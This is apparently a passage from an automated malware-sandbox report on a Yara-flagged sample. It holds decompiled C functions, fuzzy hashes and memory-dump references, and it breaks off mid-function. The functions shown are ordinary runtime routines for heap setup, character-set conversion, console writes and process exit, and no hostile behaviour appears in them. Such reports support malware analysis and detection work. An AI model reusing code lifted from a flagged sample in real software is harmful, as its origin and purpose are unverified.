                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C523F4, Relevance: .0, Instructions: 15COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290752466.0000000000C52000.00000040.00000001.sdmp, Offset: 00C52000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5646c19defc2a08c7ae8f30271a4e9ff198cf348df9a046388e725802a9dbd5a
                                                                                              • Instruction ID: c2ae258a6274e5d466e742ebd83c81ee569c777681d43b71a07a3e8568ee9f93
                                                                                              • Opcode Fuzzy Hash: 5646c19defc2a08c7ae8f30271a4e9ff198cf348df9a046388e725802a9dbd5a
                                                                                              • Instruction Fuzzy Hash: 07D05EB9204A814FD3268A1CC1A4B953BD4EF52B05F4684F9AC008B6A3C768DAC5E200
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C523BC, Relevance: .0, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290752466.0000000000C52000.00000040.00000001.sdmp, Offset: 00C52000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: af58af32284707734a1ec118236c1f0427557ebbce583eb1866684ad5e5cdb17
                                                                                              • Instruction ID: 4bf9d63b462fcd0cef016daebd21a2f9cfee42ca39b2bfaf6212b1ce4f189cfb
                                                                                              • Opcode Fuzzy Hash: af58af32284707734a1ec118236c1f0427557ebbce583eb1866684ad5e5cdb17
                                                                                              • Instruction Fuzzy Hash: 03D05E782002814BC715DB1CC294F5937D8AB41B01F0644E8AC108B272C7B8EDC5C600
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 004067FE, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004067FE() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x4132b0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                                                                              0x004067fe
                                                                                              0x00406806
                                                                                              0x0040680e

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: HeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 54951025-0
                                                                                              • Opcode ID: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                                                                                              • Instruction ID: ab0ad82ebdde72e163074a118323e5abeae2aeda4b6cf9790db401cd62e62c3c
                                                                                              • Opcode Fuzzy Hash: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                                                                                              • Instruction Fuzzy Hash: F7A011B0200200CBC3008F38AA8820A3AA8AA08282308C2B8A008C00A0EB388088AA08
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 023A19A0, Relevance: .1, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 85663d909e8412738dde3738fd989b092d8d3d4510561dc0a87d7c5f22ca1829
                                                                                              • Instruction ID: a803bfe6923d53bf40d3a4127bfc240ad8da3f3992ea9920253a7df57f79cfde
                                                                                              • Opcode Fuzzy Hash: 85663d909e8412738dde3738fd989b092d8d3d4510561dc0a87d7c5f22ca1829
                                                                                              • Instruction Fuzzy Hash: 20212574905209DFCB04DFA8C4947FEBBB2EF46305F1484AAD485BB391CB749A84DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 023A19B0, Relevance: .1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b7384b9168efe9bdde6bd03131f42d1e7749ac0b335453268aed7c24e324e479
                                                                                              • Instruction ID: d4714443634d0db695a65f0fa1d329487696f8d3a3be3897429ecb8c82fb312e
                                                                                              • Opcode Fuzzy Hash: b7384b9168efe9bdde6bd03131f42d1e7749ac0b335453268aed7c24e324e479
                                                                                              • Instruction Fuzzy Hash: 0B21D374901209DFCB04EFA8C498BFDBBB2EB45305F5085AAD44577391CB749A84DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 023A0728, Relevance: .0, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                              • Instruction ID: df160daa99955e7728e2d982c9e314b7dd0141955af1292721deb231812fd35f
                                                                                              • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                              • Instruction Fuzzy Hash: 26B09236E040089ADB008EC4F4413FCF774E782229F102063C218B3951823282A88A89
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 023A17F8, Relevance: .0, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                              • Instruction ID: f5c0e44eb68e31111be9501e48d07f32b975f6c650ab6ce041ac99908a5184e2
                                                                                              • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                              • Instruction Fuzzy Hash: C1B0923AE040089ADB108EC4B4413FCF7B8E782269F102063C21CB3941823282688689
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 023A14C0, Relevance: .0, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                              • Instruction ID: 68a90dc702e1884d74c68911ce512a558db95729075be1066e592e80c5f31cab
                                                                                              • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                              • Instruction Fuzzy Hash: 66B09236E080089ADB008EC8B4413FDF774E782229F142163C21DB3902823586688689
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 70%
                                                                                              			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x7e6e3832
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                                                                                              0x004078d4
                                                                                              0x004078d5
                                                                                              0x004078d6
                                                                                              0x004078dd
                                                                                              0x004078e2
                                                                                              0x004078e8
                                                                                              0x004078ee
                                                                                              0x004078f4
                                                                                              0x004078f7
                                                                                              0x004078f7
                                                                                              0x004078fa
                                                                                              0x004078fc
                                                                                              0x004078fc
                                                                                              0x004078fa
                                                                                              0x004078fe
                                                                                              0x00407903
                                                                                              0x0040790a
                                                                                              0x0040790d
                                                                                              0x0040790d
                                                                                              0x00407929
                                                                                              0x0040792f
                                                                                              0x00407934
                                                                                              0x00407ac7
                                                                                              0x00407ad2
                                                                                              0x00407ada
                                                                                              0x0040793a
                                                                                              0x0040793a
                                                                                              0x0040793d
                                                                                              0x00407942
                                                                                              0x00407946
                                                                                              0x0040799a
                                                                                              0x0040799a
                                                                                              0x0040799c
                                                                                              0x0040799e
                                                                                              0x00407abc
                                                                                              0x00407abc
                                                                                              0x00407abe
                                                                                              0x00407abf
                                                                                              0x00407ac5
                                                                                              0x00000000
                                                                                              0x00407ac5
                                                                                              0x004079af
                                                                                              0x004079b5
                                                                                              0x004079b7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004079bd
                                                                                              0x004079cf
                                                                                              0x004079d4
                                                                                              0x004079d8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004079e5
                                                                                              0x00407a1f
                                                                                              0x00407a22
                                                                                              0x00407a25
                                                                                              0x00407a27
                                                                                              0x00407a29
                                                                                              0x00407a2b
                                                                                              0x00407a77
                                                                                              0x00407a77
                                                                                              0x00407a79
                                                                                              0x00407a79
                                                                                              0x00407a7b
                                                                                              0x00407ab5
                                                                                              0x00407ab6
                                                                                              0x00000000
                                                                                              0x00407abb
                                                                                              0x00407a8f
                                                                                              0x00407a94
                                                                                              0x00407a96
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a9a
                                                                                              0x00407a9b
                                                                                              0x00407a9c
                                                                                              0x00407a9f
                                                                                              0x00407adb
                                                                                              0x00407ade
                                                                                              0x00407aa1
                                                                                              0x00407aa1
                                                                                              0x00407aa2
                                                                                              0x00407aa2
                                                                                              0x00407aaf
                                                                                              0x00407ab1
                                                                                              0x00407ab3
                                                                                              0x00407ae4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407ab3
                                                                                              0x00407a2d
                                                                                              0x00407a30
                                                                                              0x00407a32
                                                                                              0x00407a34
                                                                                              0x00407a36
                                                                                              0x00407a39
                                                                                              0x00407a3e
                                                                                              0x00407a59
                                                                                              0x00407a5b
                                                                                              0x00407a65
                                                                                              0x00407a67
                                                                                              0x00407a68
                                                                                              0x00407a6a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a6c
                                                                                              0x00407a72
                                                                                              0x00407a72
                                                                                              0x00000000
                                                                                              0x00407a72
                                                                                              0x00407a40
                                                                                              0x00407a42
                                                                                              0x00407a46
                                                                                              0x00407a4b
                                                                                              0x00407a4d
                                                                                              0x00407a4f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a51
                                                                                              0x00000000
                                                                                              0x00407a51
                                                                                              0x004079e7
                                                                                              0x004079ec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004079f2
                                                                                              0x004079f4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a10
                                                                                              0x00407a14
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a1a
                                                                                              0x0040794d
                                                                                              0x0040794f
                                                                                              0x00407951
                                                                                              0x00407959
                                                                                              0x00407978
                                                                                              0x0040797a
                                                                                              0x00407984
                                                                                              0x00407986
                                                                                              0x00407987
                                                                                              0x00407989
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040798f
                                                                                              0x00407995
                                                                                              0x00407995
                                                                                              0x00000000
                                                                                              0x00407995
                                                                                              0x0040795d
                                                                                              0x00407961
                                                                                              0x00407966
                                                                                              0x0040796a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407970
                                                                                              0x00000000
                                                                                              0x00407970

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                                                                                              • __alloca_probe_16.LIBCMT ref: 00407961
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                                                                                              • __alloca_probe_16.LIBCMT ref: 00407A46
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                                                                                              • __freea.LIBCMT ref: 00407AB6
                                                                                                • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                                              • __freea.LIBCMT ref: 00407ABF
                                                                                              • __freea.LIBCMT ref: 00407AE4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3864826663-0
                                                                                              • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                                                                              • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                                                                                              • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                                                                              • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 72%
                                                                                              			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x7e6e3832
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































                                                                                              0x0040822b
                                                                                              0x00408232
                                                                                              0x00408235
                                                                                              0x0040823d
                                                                                              0x00408241
                                                                                              0x0040824d
                                                                                              0x00408250
                                                                                              0x00408253
                                                                                              0x0040825a
                                                                                              0x00408262
                                                                                              0x00408265
                                                                                              0x0040826b
                                                                                              0x00408271
                                                                                              0x00408276
                                                                                              0x00408278
                                                                                              0x0040827b
                                                                                              0x00408280
                                                                                              0x0040828a
                                                                                              0x00408291
                                                                                              0x00408294
                                                                                              0x0040829b
                                                                                              0x004082a2
                                                                                              0x004082ce
                                                                                              0x004082f4
                                                                                              0x004082f6
                                                                                              0x00000000
                                                                                              0x004082d0
                                                                                              0x004082d3
                                                                                              0x0040839a
                                                                                              0x004083a6
                                                                                              0x004083b1
                                                                                              0x004083b6
                                                                                              0x004082d9
                                                                                              0x004082e0
                                                                                              0x004082e5
                                                                                              0x004082eb
                                                                                              0x004082f1
                                                                                              0x00000000
                                                                                              0x004082f1
                                                                                              0x004082eb
                                                                                              0x004082d3
                                                                                              0x004082a4
                                                                                              0x004082a8
                                                                                              0x004082ab
                                                                                              0x004082b1
                                                                                              0x004082b3
                                                                                              0x004082b6
                                                                                              0x004082ba
                                                                                              0x004082f7
                                                                                              0x004082fa
                                                                                              0x004082fb
                                                                                              0x00408300
                                                                                              0x00408306
                                                                                              0x0040830c
                                                                                              0x0040831b
                                                                                              0x00408321
                                                                                              0x00408327
                                                                                              0x0040832c
                                                                                              0x00408348
                                                                                              0x004083bb
                                                                                              0x004083c1
                                                                                              0x0040834a
                                                                                              0x00408352
                                                                                              0x0040835b
                                                                                              0x00408361
                                                                                              0x00000000
                                                                                              0x00408363
                                                                                              0x00408365
                                                                                              0x00408368
                                                                                              0x00408381
                                                                                              0x00000000
                                                                                              0x00408383
                                                                                              0x00408387
                                                                                              0x00408389
                                                                                              0x0040838c
                                                                                              0x00000000
                                                                                              0x0040838c
                                                                                              0x00408387
                                                                                              0x00408381
                                                                                              0x00408361
                                                                                              0x0040835b
                                                                                              0x00408348
                                                                                              0x0040832c
                                                                                              0x00408306
                                                                                              0x00000000
                                                                                              0x0040838f
                                                                                              0x0040838f
                                                                                              0x004083c3
                                                                                              0x004083cd
                                                                                              0x004083d5

                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
                                                                                              • __fassign.LIBCMT ref: 004082E0
                                                                                              • __fassign.LIBCMT ref: 004082FB
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
                                                                                              • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
                                                                                              • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                                                                              • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                                                                                              • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                                                                              • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 27%
                                                                                              			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x7e6e3832
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









                                                                                              0x00403639
                                                                                              0x00403640
                                                                                              0x00403643
                                                                                              0x00403647
                                                                                              0x00403652
                                                                                              0x0040365a
                                                                                              0x00403665
                                                                                              0x0040366b
                                                                                              0x0040366f
                                                                                              0x00403676
                                                                                              0x0040367c
                                                                                              0x0040367c
                                                                                              0x0040367e
                                                                                              0x00403683
                                                                                              0x00403688
                                                                                              0x00403688
                                                                                              0x00403693
                                                                                              0x0040369b

                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                                                                              • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                                                                                              • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                                                                              • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 79%
                                                                                              			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x7e6e3832
				_v8 = _t34 ^ _t72;
				_push(_t53);
